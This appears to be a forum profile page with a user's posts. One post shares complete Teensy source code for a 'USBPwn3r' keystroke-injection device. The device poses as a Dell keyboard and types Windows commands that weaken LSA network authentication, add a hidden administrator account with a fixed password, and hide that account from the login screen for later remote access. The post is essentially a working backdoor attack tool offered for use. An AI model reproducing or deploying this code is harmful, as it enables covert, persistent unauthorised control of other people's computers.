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DJ Felix

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Everything posted by DJ Felix

  1. Looks like the site is down. Anyone have a mirror URL?
  2. I used your library in my first ducky I dubbed the USBPwn3r: Flickr Photo Set Code: /* The following is Jon Marler's USBPwn3r proof-of-concept device for Teensy 2.0 Uses the PHUKD library from: http://www.irongeek.com/i.php?page=securit...eystroke-dongle To learn more about Teensyduino see: http://www.pjrc.com/teensy/teensyduino.html Look in arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_api.h for key definitions Edit arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_private.h to change USB Vendor and Product ID Compile Notes: Make sure you set the correct board type under Tools->Board, and the correct Tools->USB type as well */ #include "phukdlib.h" // The setup() method runs once, when the sketch starts void setup() { delay(20000); CommandAtRunBarMSWIN("cmd"); delay(500); Keyboard.println("REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa /v forceguest /t REG_DWORD /d 00000000 /f"); Keyboard.println("cls"); Keyboard.println("NET USER IUSR_ADMIN P4ssw0rd! /ADD /active:yes /fullname:\"Built-in admin\" /expires:never /times:all"); Keyboard.println("cls"); Keyboard.println("NET LOCALGROUP Administrators IUSR_ADMIN /ADD"); Keyboard.println("cls"); Keyboard.println("REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /v IUSR_ADMIN /t REG_DWORD /d 00000000 /f"); Keyboard.println("exit"); } // the loop() method runs over and over again, checking for events void loop() { } The 20 second delay is to allow for windows to add the device and activate it. I also modified the teensy header files to use "Dell Keyboard" as the USB descriptor and changed the USB Vendor and Product ID's to match a Dell Keyboard. The code is simple. It adds an administrator, and enables network login over the network for tools like Cain and Abel among others. Using the PHUKD library made the code dead simple and easy to write. Thanks Irongeek!
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